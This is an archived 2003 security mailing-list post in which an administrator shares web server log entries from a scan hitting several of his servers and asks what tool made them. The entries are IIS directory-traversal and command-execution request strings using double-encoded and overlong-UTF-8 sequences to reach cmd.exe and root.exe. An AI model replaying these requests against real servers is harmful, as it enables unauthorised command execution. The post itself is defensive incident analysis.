Anyone know this tool?
From: Danny (danny_at_eboundary.com)
Date: 07/29/03
- Previous message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
- In reply to: Shafik Yaghmour: "Re: "access_log?hello" ?"
- Next in thread: Jason Rumney: "Re: Anyone know this tool?"
- Reply: Jason Rumney: "Re: Anyone know this tool?"
- Reply: James Williams: "RE: Anyone know this tool?"
- Maybe reply: Jason Falciola: "Re: Anyone know this tool?"
- Maybe reply: Jason Falciola: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 28 Jul 2003 23:24:16 -0400 To: incidents@securityfocus.com
Does anyone happen to know what tool this is? I've seen the exact same
scans on 6 of our servers on completely different networks. All the
scans have been from different source IP's and all the servers were hit
within a space of a few hours.
Curiosity is getting the better of me since i've never seen this exact
pattern before :)
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../
winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-"
"-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
"-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic
boundaries?
AIM: eBoundaryTch | ICQ: 3090141
---------------------------------------------------------------------------
----------------------------------------------------------------------------
- Previous message: Paul Tinsley: "RE: Exploit for Windows RPC may be in the wild!"
- In reply to: Shafik Yaghmour: "Re: "access_log?hello" ?"
- Next in thread: Jason Rumney: "Re: Anyone know this tool?"
- Reply: Jason Rumney: "Re: Anyone know this tool?"
- Reply: James Williams: "RE: Anyone know this tool?"
- Maybe reply: Jason Falciola: "Re: Anyone know this tool?"
- Maybe reply: Jason Falciola: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
